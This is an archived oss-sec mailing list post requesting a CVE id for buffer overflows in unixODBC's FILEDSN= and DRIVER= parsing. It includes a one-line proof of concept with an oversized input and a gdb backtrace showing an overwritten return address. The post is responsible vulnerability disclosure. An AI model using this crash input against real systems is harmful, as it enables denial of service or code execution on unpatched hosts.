oss-sec mailing list archives
CVE id request: Multiple buffer overflow in unixODBC
From: Felipe Pena <felipensp () gmail com>
Date: Tue, 29 May 2012 09:42:42 -0300
Hi, please assign a CVE id for the issue:
Multiple buffer overflow in unixODBC
===========================
The library unixODBC doesn't check properly the input from FILEDSN=,
DRIVER= options in the DSN,
which causes buffer overflow when passed to the SQLDriverConnect() function.
The unixODBC maintainer has been notified about the issue.
Version affected
============
FILEDSN= as of 2.0.10
DRIVER= as of 2.3.1
PoC
===
$ ./poc "FILEDSN=$(python -c "print 'A'*10000")"
Segmentation fault
(gdb) bt
#0 0x00007ffff7bc8c81 in SQLReadFileDSN (pszFileName=<value optimized
out>, pszAppName=<value optimized out>, pszKeyName=<value optimized
out>,
pszString=<value optimized out>, nString=<value optimized out>,
pnString=<value optimized out>) at SQLReadFileDSN.c:207
#1 0x4141414141414141 in ?? ()
CREDITS
=======
This bug was discovered by Felipe Pena.
BugSec Team - http://www.bugsec.com.br/
Current thread:
- CVE id request: Multiple buffer overflow in unixODBC Felipe Pena (May 29)
- Re: CVE id request: Multiple buffer overflow in unixODBC Kurt Seifried (May 29)
- Re: CVE id request: Multiple buffer overflow in unixODBC Tomas Hoger (May 30)
- Re: CVE id request: Multiple buffer overflow in unixODBC Henri Salo (May 30)
- Re: CVE id request: Multiple buffer overflow in unixODBC Kurt Seifried (May 30)
- Re: CVE id request: Multiple buffer overflow in unixODBC Felipe Pena (May 30)
- Re: CVE id request: Multiple buffer overflow in unixODBC Kurt Seifried (May 30)
- Re: CVE id request: Multiple buffer overflow in unixODBC Felipe Pena (May 30)
- Re: CVE id request: Multiple buffer overflow in unixODBC Tomas Hoger (May 31)
- Re: CVE id request: Multiple buffer overflow in unixODBC Kurt Seifried (Jun 05)